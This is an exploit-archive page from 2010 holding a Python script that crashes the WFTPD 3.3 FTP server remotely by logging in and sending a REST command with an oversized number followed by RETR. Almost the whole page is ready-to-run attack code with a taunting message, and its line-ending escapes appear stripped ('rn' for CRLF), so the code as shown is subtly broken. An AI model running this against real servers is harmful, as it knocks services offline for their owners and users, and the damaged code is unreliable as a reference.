WFTPD 3.3 Remote REST DoS

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WFTPD 3.3 Remote REST DoS
# Published : 2010-03-16
# Author : dmnt
# Previous Title : mplayer <= 4.4.1 NULL pointer dereference exploit poc
# Next Title : Crimson Editor SEH Overwrite Vulnerability

# WFTPD 3.3 unhandled exception
#
# (x)dmnt 2010
# -*- coding: windows-1252 -*-

import socket
import sys, time


def help_info():
    print ("Usage: wftpdkill <host> <login> <password> <existingfle>n")

def dos_it(hostname, username, passwd, exfile):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("[-] Connection error!")
        sys.exit(1)
    r=sock.recv(2048)
    print "[+] Connected"
    sock.send("user %srn" %username)
    r=sock.recv(1024)
    time.sleep(3)
    sock.send("pass %srn" %passwd)
    r=sock.recv(1024)
    print "Send evil commands"
    time.sleep(3)
    sock.send("pasvrn")
    r=sock.recv(1024)
    time.sleep(3)
    sock.send("rest 999999999999999999999999999999999999999999999999999999999999999999rn")
    r=sock.recv(1024)
    time.sleep(3)
    sock.send("retr %srn" %exfile)
    time.sleep(3)
    sock.send("Burn, muthfcka, burn!rn")
    sock.close()
    print "Server killedrn"

print ("nWFTPD 3.3 remote DoS exploit")

if len(sys.argv) < 5:
    help_info()
    sys.exit(1)

else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    exfile=sys.argv[4]
    dos_it(hostname,username,passwd,exfile)
    sys.exit(0)